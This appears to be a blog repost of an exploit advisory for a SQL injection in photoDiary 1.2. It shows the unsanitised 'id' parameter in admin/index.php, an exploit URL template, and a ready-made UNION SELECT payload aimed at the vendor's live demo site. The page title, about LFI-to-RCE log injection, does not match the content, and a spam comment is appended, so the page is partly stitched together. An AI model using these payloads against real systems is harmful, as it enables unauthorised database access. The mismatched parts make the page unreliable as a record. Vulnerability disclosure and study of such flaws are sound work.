LFI to RCE via access_log injection

photoDiary 1.2 - SQL Injection Vuln


[o] photoDiary 1.2 SQL Injection Vulnerability

Software : photoDiary version 1.2
Vendor : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author : NoGe


[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];


[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]


[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--


[o] Note
its funny coz usually you do sql to get admin login but this one you must have admin privs to execute sql. lolz


Comments

labatterie said…
Teh mengandung sekitar dan satu ons coklat mengandung sekitar kafein.